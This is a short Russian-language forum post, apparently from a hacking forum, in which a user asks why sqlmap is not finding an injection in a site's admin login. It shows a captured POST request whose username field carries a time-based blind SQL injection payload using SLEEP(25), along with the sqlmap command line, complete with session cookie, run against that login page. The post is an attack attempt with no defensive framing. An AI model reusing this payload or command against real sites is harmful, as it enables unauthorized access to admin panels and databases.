Сообщение от
t0ma5
↑
sqlmap находит, просто надо быть поприветливей с ним, он не проходимец)
Вот я и говорю мож не те параметры задаю((
POST /admin/login/ HTTP/1.1
Cache-Control: no-cache
Referer:
https://site.com/admin/login/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
Host: site.com
Accept-Encoding: gzip, deflate
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login
sqlmap.py -u
https://site.com/admin/login/ --data=username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP( 25))A))%2b%27&password=&login=Login --cookie=PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 --random-agent
что тогда здесь не так?